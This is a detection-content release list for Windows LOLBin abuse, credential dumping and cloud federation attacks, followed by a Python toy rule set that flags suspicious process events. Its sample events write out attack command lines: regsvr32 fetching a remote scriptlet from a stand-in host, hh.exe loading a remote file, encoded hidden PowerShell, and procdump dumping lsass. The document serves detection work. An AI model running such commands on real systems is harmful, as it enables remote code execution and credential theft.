New Stories
- Cloud Federated Credential Abuse
- Suspicious Regsvr32 Activity
- Suspicious Rundll32 Activity
- Suspicious Compiled HTML Activity
- Suspicious Regsvcs Regasm Activity
- Cobalt Strike
New Detections
- Detect HTML Help URL in Command Line
- Detect HTML Help Spawn Child Process
- Detect HTML Help Renamed
- Detect HTML Help Using InfoTech Storage Handlers
- Detect Regasm Spawning a Child Process
- Detect Regsvcs Spawning a Child Process
- Detect Regsvcs With Network Connection
- Detect Regasm with no Command Line Arguments
- Detect Regasm With Network Connection
- Detect regsvcs with no Command Line Arguments
- Detect Regsvr32 Application Control Bypass
- Suspicious regsvr32 register suspicious path
- Ntdsutil Export NTDS
- Dump lsass via procdump
- Dump lsass via procdump rename
- Creation of lsass dump with taskmgr
- Suspicious rundll32 rename
- Detect Rundll32 Application Control Bypass - advpack & ieadvpack
- Detect Rundll32 Application Control Bypass - syssetup
- Detect Rundll32 Application Control Bypass - setupapi
- Suspicious Rundll32 StartW
- Suspicious Rundll32 DllRegisterServer
- Suspicious Rundll32 with no command line arguments
- Certutil exe certification extraction
- AWS SAML access by provider user and principal
- AWS SAML update identity provider
- O365 Excessive SSO logon errors
- O365 added service principal
- O365 new federated domain added
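Most of the endpoint detections above key on the same handful of process-creation fields: image path, the PE OriginalFileName, the command line and the parent image. The block below is an added example, not Splunk's own SPL or content: a toy rule set that approximates the logic the detection names describe (bare rundll32/regasm/regsvcs launches, renamed LOLBins, hh.exe fetching a URL or using InfoTech handlers and spawning children, the regsvr32 scrobj.dll and rundll32 INF-installer bypasses, StartW and DllRegisterServer exports, procdump against lsass, ntdsutil IFM export, certutil -exportPFX), run over constructed Sysmon-style events. The rule names, field names, regexes and sample events are the author's assumptions; the network-connection and taskmgr dump detections need network and file-creation events and are not modelled here.

```python
"""Added example (not Splunk content): toy versions of several listed detections over constructed events."""
import re
from dataclasses import dataclass
from typing import Callable, List, Tuple


@dataclass(frozen=True)
class ProcessEvent:
    """The fields the listed endpoint detections key on (Sysmon Event ID 1 / EDR telemetry)."""
    image: str               # full path of the created process
    original_file_name: str  # OriginalFileName from the PE version resource; survives a rename on disk
    command_line: str
    parent_image: str


def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def arguments(cmd: str) -> str:
    """Drop the (possibly quoted) image token and return everything after it."""
    m = re.match(r'\s*(?:"[^"]*"|\S+)\s*(.*)$', cmd, re.S)
    return m.group(1).strip() if m else ""


def is_tool(e: ProcessEvent, tool: str) -> bool:
    """Match on the on-disk name OR the PE OriginalFileName, so a renamed copy still counts."""
    return tool in (basename(e.image), e.original_file_name.lower())


# LOLBins whose rename alone is worth an alert (the "... Renamed" / "... rename" detections).
RENAME_WATCH = {"rundll32.exe", "regsvr32.exe", "hh.exe"}
USER_WRITABLE = re.compile(r"\\(users|programdata|windows\\temp)\\", re.I)
INF_BYPASS = re.compile(r"(ie)?advpack\.dll,\s*launchinfsection|syssetup\.dll,\s*setupinfobjectinstallaction"
                        r"|setupapi\.dll,\s*installhinfsection")

Rule = Tuple[str, Callable[[ProcessEvent], object]]
RULES: List[Rule] = [  # assumed approximations of the listed detections, not their real search logic
    ("Suspicious Rundll32 with no command line arguments",
     lambda e: is_tool(e, "rundll32.exe") and arguments(e.command_line) == ""),
    ("Detect Regasm/regsvcs with no Command Line Arguments",
     lambda e: (is_tool(e, "regasm.exe") or is_tool(e, "regsvcs.exe")) and arguments(e.command_line) == ""),
    ("Renamed LOLBin (rundll32 / regsvr32 / HTML Help)",
     lambda e: e.original_file_name.lower() in RENAME_WATCH and basename(e.image) != e.original_file_name.lower()),
    ("Detect HTML Help URL in Command Line",
     lambda e: is_tool(e, "hh.exe") and re.search(r"\b(https?|ftp)://", e.command_line, re.I)),
    ("Detect HTML Help Using InfoTech Storage Handlers",
     lambda e: is_tool(e, "hh.exe") and re.search(r"\b(its|mk:@msitstore):", e.command_line, re.I)),
    ("Detect HTML Help Spawn Child Process",
     lambda e: basename(e.parent_image) == "hh.exe"),
    ("Detect Regsvr32 Application Control Bypass",
     lambda e: is_tool(e, "regsvr32.exe") and "scrobj.dll" in e.command_line.lower() and "/i:" in e.command_line.lower()),
    ("Suspicious regsvr32 register suspicious path",
     lambda e: is_tool(e, "regsvr32.exe") and USER_WRITABLE.search(arguments(e.command_line))),
    ("Detect Rundll32 Application Control Bypass (advpack/ieadvpack/syssetup/setupapi)",
     lambda e: is_tool(e, "rundll32.exe") and INF_BYPASS.search(e.command_line.lower())),
    ("Suspicious Rundll32 StartW",
     lambda e: is_tool(e, "rundll32.exe") and re.search(r",\s*startw\b", e.command_line, re.I)),
    ("Suspicious Rundll32 DllRegisterServer",
     lambda e: is_tool(e, "rundll32.exe") and "dllregisterserver" in e.command_line.lower()),
    ("Dump lsass via procdump (any image name)",   # keyed on arguments, so a renamed procdump is still caught
     lambda e: re.search(r"\s-m[am]\b", e.command_line) and "lsass" in e.command_line.lower()),
    ("Ntdsutil Export NTDS",
     lambda e: is_tool(e, "ntdsutil.exe") and "ntds" in e.command_line.lower()
               and ("ifm" in e.command_line.lower() or "create full" in e.command_line.lower())),
    ("Certutil exe certification extraction",
     lambda e: is_tool(e, "certutil.exe") and "-exportpfx" in e.command_line.lower()),
]


def evaluate(e: ProcessEvent) -> List[str]:
    """Return the names of every rule the event trips, in RULES order."""
    return [name for name, pred in RULES if pred(e)]


SYS32 = r"C:\Windows\System32"
TEMP = r"C:\Users\bob\AppData\Local\Temp"
EVENTS = [  # constructed sample telemetry, not real captures
    ProcessEvent(SYS32 + r"\rundll32.exe", "RUNDLL32.EXE",             # benign Control Panel launch
                 r'"C:\Windows\System32\rundll32.exe" shell32.dll,Control_RunDLL', r"C:\Windows\explorer.exe"),
    ProcessEvent(SYS32 + r"\rundll32.exe", "RUNDLL32.EXE",             # bare rundll32: injection target
                 r'"C:\Windows\System32\rundll32.exe"', TEMP + r"\update.exe"),
    ProcessEvent(TEMP + r"\svchost.exe", "RUNDLL32.EXE",               # renamed rundll32 calling StartW
                 TEMP + r"\svchost.exe " + TEMP + r"\beacon.dll,StartW", r"C:\Windows\explorer.exe"),
    ProcessEvent(SYS32 + r"\hh.exe", "HH.exe", r"hh.exe http://203.0.113.10/help.chm", r"C:\Windows\explorer.exe"),
    ProcessEvent(SYS32 + r"\WindowsPowerShell\v1.0\powershell.exe", "PowerShell.EXE",
                 "powershell.exe -nop -w hidden -enc SQBFAFgA", SYS32 + r"\hh.exe"),
    ProcessEvent(SYS32 + r"\regsvr32.exe", "REGSVR32.EXE",             # scrobj.dll remote scriptlet
                 "regsvr32.exe /s /n /u /i:http://203.0.113.10/a.sct scrobj.dll", SYS32 + r"\cmd.exe"),
    ProcessEvent(SYS32 + r"\regsvr32.exe", "REGSVR32.EXE",
                 r"regsvr32.exe /s C:\Users\bob\AppData\Roaming\x.dll", SYS32 + r"\cmd.exe"),
    ProcessEvent(r"C:\Users\bob\Downloads\notepad.exe", "procdump",    # renamed procdump against lsass
                 r"notepad.exe -accepteula -ma lsass.exe C:\Users\bob\l.dmp", SYS32 + r"\cmd.exe"),
]

if __name__ == "__main__":
    for ev in EVENTS:
        print(f"{basename(ev.image):16} -> {evaluate(ev) or ['-']}")
```

The point worth carrying into real content is is_tool(): rules that match only on the on-disk process name go quiet the moment the binary is copied to a new name, which is exactly what the "Renamed" detections exist to catch, so every rule here also consults OriginalFileName, and the lsass rule ignores the image name entirely.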